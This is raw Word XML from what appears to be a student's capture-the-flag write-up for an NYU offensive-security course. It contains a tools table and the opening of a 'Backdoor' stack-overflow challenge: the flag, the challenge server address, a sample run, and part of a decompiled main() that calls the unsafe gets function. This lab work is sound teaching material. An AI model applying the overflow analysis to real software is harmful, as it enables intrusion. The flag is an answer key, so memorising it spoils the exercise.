            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>GEF (GDB Enhanced Features)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24390F14" w14:textId="675A0135" w:rsidR="00D757EC" w:rsidRDefault="00D757EC" w:rsidP="00A34711">
            <w:r w:rsidRPr="00D757EC">
              <w:t>https://github.com/hugsy/gef</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E0856" w:rsidRPr="005264D0" w14:paraId="0F6FC29B" w14:textId="77777777" w:rsidTr="00D757EC">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11C7CF3B" w14:textId="609D2B05" w:rsidR="002E0856" w:rsidRPr="002E0856" w:rsidRDefault="002E0856" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Ghidra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3965BF7C" w14:textId="61BD19B4" w:rsidR="002E0856" w:rsidRPr="002E0856" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidR="002E0856" w:rsidRPr="00F6092A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://ghidra-sre.org/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="002E0856">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E0856" w:rsidRPr="005264D0" w14:paraId="3080E212" w14:textId="77777777" w:rsidTr="00D757EC">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BCC968D" w14:textId="1B5E67E9" w:rsidR="002E0856" w:rsidRPr="002E0856" w:rsidRDefault="002E0856" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72B8A438" w14:textId="23AA4B9D" w:rsidR="002E0856" w:rsidRPr="002E0856" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="002E0856" w:rsidRPr="00F6092A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://netcat.sourceforge.net/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="002E0856">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E0856" w:rsidRPr="005264D0" w14:paraId="2E4DB3E9" w14:textId="77777777" w:rsidTr="00D757EC">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AFF5B4D" w14:textId="1E204924" w:rsidR="002E0856" w:rsidRPr="002E0856" w:rsidRDefault="002E0856" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E0856">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PwnTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="515E6B78" w14:textId="114F4B2B" w:rsidR="002E0856" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidR="002E0856" w:rsidRPr="00F6092A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/Gallopsled/pwntools</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="002E0856">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF0191" w:rsidRPr="005264D0" w14:paraId="78A49694" w14:textId="77777777" w:rsidTr="00D757EC">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FAA091B" w14:textId="44891B68" w:rsidR="00AF0191" w:rsidRPr="002E0856" w:rsidRDefault="00AF0191" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>ROPgadget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092C0410" w14:textId="77777777" w:rsidR="00AF0191" w:rsidRDefault="00AF0191" w:rsidP="00A34711"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="430646AA" w14:textId="77777777" w:rsidR="00C670F2" w:rsidRDefault="00C670F2" w:rsidP="00225AF6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Appendix_C:_Mathwhiz"/>
      <w:bookmarkStart w:id="13" w:name="_Appendix_C:_Stropsploit.py"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="267DDF6B" w14:textId="77777777" w:rsidR="00C670F2" w:rsidRDefault="00C670F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E1C31D" w14:textId="1CB7A964" w:rsidR="00C670F2" w:rsidRPr="00111129" w:rsidRDefault="00437E81" w:rsidP="00767735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Appendix_C:_Postage"/>
      <w:bookmarkStart w:id="15" w:name="_Appendix_C:_Boffin"/>
      <w:bookmarkStart w:id="16" w:name="_Appendix_C:_GitGOTGood_Pwn.py"/>
      <w:bookmarkStart w:id="17" w:name="_Appendix_C:_Backdoor"/>
      <w:bookmarkStart w:id="18" w:name="_Toc161243441"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="0044173D">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00847435">
        <w:t>Backdoor and School</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="25988886" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="001215EC" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc160920106"/>
      <w:bookmarkStart w:id="20" w:name="_Backdoor_1"/>
      <w:bookmarkStart w:id="21" w:name="_Toc161243442"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="67BA4608" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00530A29" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc160920107"/>
      <w:r w:rsidRPr="000F56D3">
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1461"/>
        <w:gridCol w:w="1234"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="3ABAAC5B" w14:textId="77777777" w:rsidTr="008A799C">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701D9A70" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="5FE1B974" w14:textId="77777777" w:rsidTr="008A799C">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2672E7AA" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00DA733E" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>100 Points</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="212E3EF9" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00EE0A5C" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Flag Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0632A49C" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D5C73">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>flag{y0u_dont_n33d_t0_jump_t0_th3_b3ginning_of_functi0ns}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="55183609" w14:textId="77777777" w:rsidTr="008A799C">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71948D99" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6B092D73" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00EE0A5C" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5A21932E" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E676B6">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>offsec-chalbroker.osiris.cyber.nyu.edu 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>339</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="327FC6FE" w14:textId="77777777" w:rsidTr="008A799C">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1CDDC772" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="03392188" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00EE0A5C" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4DDF4" w:themeFill="accent1" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="41C80BF6" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Stack Overflows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00847435" w:rsidRPr="005264D0" w14:paraId="574803DF" w14:textId="77777777" w:rsidTr="008A799C">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6B01DAF5" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="005264D0" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4139DD4B" w14:textId="77777777" w:rsidR="00847435" w:rsidRPr="00EE0A5C" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE0A5C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="63EB5C7D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00C96166" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc160920108"/>
      <w:r w:rsidRPr="00840BBB">
        <w:t>Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="48AA424C" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">On the first run, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prints a message making a claim that the code is "super-secure".</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="0D75B00F" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="46BE38F3" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/5-Week]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A9B9155" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">└─$ ./backdoor    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D230F32" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>I patched out all my old bugs, so I know my code is super-secure! Tell me your name, friend:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="150AB62D" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Nobody</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56FB9AFD" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>You can't hack me, Nobody</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76EFE23F" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>First Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC790EE" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="00847435">
      <w:r>
        <w:t xml:space="preserve">The program </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> method, shown below after decompilation with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, holds all of the significant functionality, including a call to the insecure </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76281">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00847435" w14:paraId="543B552C" w14:textId="77777777" w:rsidTr="008A799C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="620FF903" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>undefined8 main(EVP_PKEY_CTX *param_1){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D0E05A" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  char data [32];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D3BA4A0" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  init(param_1);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74277659" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  puts(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28F427A6" w14:textId="77777777" w:rsidR="00847435" w:rsidRDefault="00847435" w:rsidP="008A799C">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
